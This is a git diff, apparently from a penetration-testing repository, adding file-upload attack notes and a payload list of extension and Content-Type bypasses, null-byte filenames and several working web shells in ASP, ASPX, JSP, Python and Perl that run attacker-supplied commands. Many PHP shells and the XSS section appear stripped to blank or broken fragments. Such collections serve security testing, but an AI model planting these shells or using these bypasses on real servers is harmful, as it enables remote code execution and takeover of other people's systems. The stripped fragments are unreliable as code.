+- Path traversal in filenames
+- File overwrite attacks
+- XXE via SVG/XML files
+
+## Risk Impact
+- **Remote Code Execution (RCE)** - Upload and execute web shells
+- **Cross-Site Scripting (XSS)** - Upload HTML/SVG files with JavaScript
+- **Path Traversal** - Overwrite critical files
+- **Denial of Service** - Upload large files, zip bombs
+- **Information Disclosure** - Read sensitive files
+- **Defacement** - Overwrite web pages
+- **Malware Distribution** - Host malicious files
+
+## Common Vulnerable Patterns
+- Blacklist-based file type validation (instead of whitelist)
+- Client-side only validation
+- Inadequate Content-Type checking
+- Missing magic byte validation
+- Predictable upload paths
+- Executable permissions on upload directories
+- Lack of file size limits
+- No antivirus scanning
+
+## File Extensions to Test
+**Web Shells & RCE:**
+- PHP: `.php`, `.php3`, `.php4`, `.php5`, `.php7`, `.phtml`, `.phar`, `.phpt`, `.pgif`, `.pht`
+- ASP: `.asp`, `.aspx`, `.asa`, `.asax`, `.ascx`, `.ashx`, `.asmx`, `.cer`, `.config`
+- JSP: `.jsp`, `.jspx`, `.jsw`, `.jsv`, `.jspf`
+- Perl: `.pl`, `.pm`, `.cgi`, `.lib`
+- Python: `.py`, `.pyc`, `.pyw`
+- Ruby: `.rb`, `.rbw`
+- Other: `.shtml`, `.shtm`, `.phar`, `.inc`
+
+**Script Files:**
+- `.js`, `.vbs`, `.bat`, `.cmd`, `.ps1`, `.sh`
+
+**Server Config:**
+- `.htaccess`, `.htpasswd`, `.web.config`, `.conf`
+
+## Payloads
+See `file-upload-payloads.txt` for comprehensive payloads including:
+- Extension bypass techniques
+- Content-Type bypasses
+- Magic byte manipulation
+- Polyglot file examples
+- Web shell payloads (PHP, ASP, JSP)
+- XSS via file upload
+- Path traversal in filenames
+- XXE via SVG/XML uploads
+- Archive-based attacks
diff --git a/File-Upload/file-upload-payloads.txt b/File-Upload/file-upload-payloads.txt
new file mode 100644
index 0000000..12274e9
--- /dev/null
+++ b/File-Upload/file-upload-payloads.txt
@@ -0,0 +1,648 @@
+# File Upload Vulnerability Payloads (2020-2025 Bug Bounty Tested)
+
+# ============================
+# FILE EXTENSION BYPASSES
+# ============================
+
+# Double Extensions
+shell.php.jpg
+shell.php.png
+shell.php.gif
+shell.php.pdf
+shell.php.txt
+shell.jpg.php
+shell.png.php
+exploit.asp.jpg
+exploit.aspx.png
+backdoor.jsp.gif
+
+# Case Variations
+shell.PHP
+shell.PhP
+shell.pHp
+shell.Php
+shell.PHp
+shell.ASP
+shell.ASPX
+shell.AsP
+shell.JSP
+
+# Null Byte Injection (older systems)
+shell.php%00.jpg
+shell.php%00.png
+shell.php\x00.jpg
+shell.asp%00.gif
+exploit.jsp%00.pdf
+
+# Special Characters
+shell.php.....
+shell.php%20
+shell.php%0a
+shell.php%00
+shell.php%0d%0a
+shell.php::$DATA
+shell.php::$INDEX_ALLOCATION
+
+# Alternate Extensions (PHP)
+shell.php3
+shell.php4
+shell.php5
+shell.php7
+shell.phtml
+shell.phar
+shell.phpt
+shell.pgif
+shell.pht
+shell.inc
+shell.hphp
+shell.ctp
+
+# Alternate Extensions (ASP/ASPX)
+shell.asp
+shell.aspx
+shell.asa
+shell.asax
+shell.ascx
+shell.ashx
+shell.asmx
+shell.cer
+shell.config
+shell.soap
+shell.rem
+
+# Alternate Extensions (JSP)
+shell.jsp
+shell.jspx
+shell.jsw
+shell.jsv
+shell.jspf
+
+# Other Language Extensions
+shell.pl
+shell.pm
+shell.cgi
+shell.py
+shell.pyc
+shell.rb
+shell.rbw
+shell.sh
+shell.bash
+
+# Executable Extensions
+malware.exe
+backdoor.bat
+script.cmd
+payload.ps1
+reverse.sh
+
+# Server Config Files
+.htaccess
+.htpasswd
+web.config
+httpd.conf
+.user.ini
+php.ini
+
+# ============================
+# CONTENT-TYPE BYPASSES
+# ============================
+
+# Common Content-Type Headers to Test:
+
+# Legitimate looking but with malicious content
+Content-Type: image/jpeg
+Content-Type: image/png
+Content-Type: image/gif
+Content-Type: image/bmp
+Content-Type: image/svg+xml
+Content-Type: application/pdf
+Content-Type: application/zip
+Content-Type: text/plain
+Content-Type: text/csv
+Content-Type: application/octet-stream
+Content-Type: video/mp4
+Content-Type: audio/mpeg
+
+# Empty or null
+Content-Type:
+Content-Type: null
+Content-Type: undefined
+
+# Malformed
+Content-Type: image/jpeg; charset=binary
+Content-Type: multipart/form-data; boundary=something
+
+# ============================
+# MAGIC BYTES (File Signatures)
+# ============================
+
+# PHP Web Shell with JPEG Header
+FF D8 FF E0 (JPEG magic bytes)
+
+
+# PHP Web Shell with PNG Header
+89 50 4E 47 0D 0A 1A 0A (PNG magic bytes)
+
+
+# PHP Web Shell with GIF Header
+GIF89a
+
+
+# PHP Web Shell with PDF Header
+%PDF-1.4
+
+
+# PHP Web Shell with ZIP Header
+PK (ZIP magic bytes)
+
+
+# ============================
+# POLYGLOT FILES (Valid Image + Valid Code)
+# ============================
+
+# GIF + PHP Polyglot
+GIF89a
+
+# JPEG + PHP Polyglot (with comment)
+# Add PHP code in JPEG comment section
+# Use exiftool: exiftool -Comment='' image.jpg
+
+# PNG + PHP Polyglot
+# Use PNG ancillary chunks to hide PHP code
+
+# BMP + PHP Polyglot
+# BMP header followed by PHP code in pixel data
+
+# ============================
+# WEB SHELL PAYLOADS
+# ============================
+
+# === PHP Web Shells ===
+
+# Simple PHP Shell
+
+
+# PHP Shell with POST
+
+
+# PHP Eval Shell
+
+
+# PHP Passthru Shell
+
+
+# PHP Exec Shell
+
+
+# PHP Shell_exec
+
+
+# PHP Backdoor
+";
+ $cmd = ($_REQUEST['cmd']);
+ system($cmd);
+ echo "";
+ die;
+}
+?>
+
+# PHP File Manager Shell
+
+
+# PHP One-liner Shells
+=`$_GET[x]`?>
+=system($_GET[x]);?>
+=shell_exec($_GET[x]);?>
+=passthru($_GET[x]);?>
+=exec($_GET[x]);?>
+
+# Obfuscated PHP Shell
+
+
+
+
+
+# PHP Reverse Shell
+&3 2>&3");
+?>
+
+# === ASP/ASPX Web Shells ===
+
+# ASP Shell
+<%
+Set oScript = Server.CreateObject("WSCRIPT.SHELL")
+Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
+Response.Write(oScript.Exec("cmd /c " & Request.QueryString("cmd")).StdOut.ReadAll())
+%>
+
+# ASPX Shell
+<%@ Page Language="C#" %>
+<%@ Import Namespace="System.Diagnostics" %>
+
+
+# ASPX One-liner
+<%@ Page Language="Jscript"%><%eval(Request.Item["cmd"],"unsafe");%>
+
+# === JSP Web Shells ===
+
+# JSP Shell
+<%@ page import="java.io.*" %>
+<%
+String cmd = request.getParameter("cmd");
+Process p = Runtime.getRuntime().exec(cmd);
+InputStream in = p.getInputStream();
+int i;
+while((i = in.read()) != -1) {
+ out.print((char)i);
+}
+%>
+
+# JSP One-liner
+<%Runtime.getRuntime().exec(request.getParameter("cmd"));%>
+
+# === Python Web Shell ===
+
+#!/usr/bin/env python
+import os
+import cgi
+form = cgi.FieldStorage()
+cmd = form.getvalue('cmd')
+os.system(cmd)
+
+# === Perl Web Shell ===
+
+#!/usr/bin/perl
+use CGI;
+$q = CGI->new;
+print $q->header;
+print `$q->param('cmd')`;
+
+# ============================
+# XSS VIA FILE UPLOAD
+# ============================
+
+# HTML File Upload
+
+
+
+
+
+
+# SVG File Upload with XSS
+
+
+
+
+# SVG with XSS (onload)
+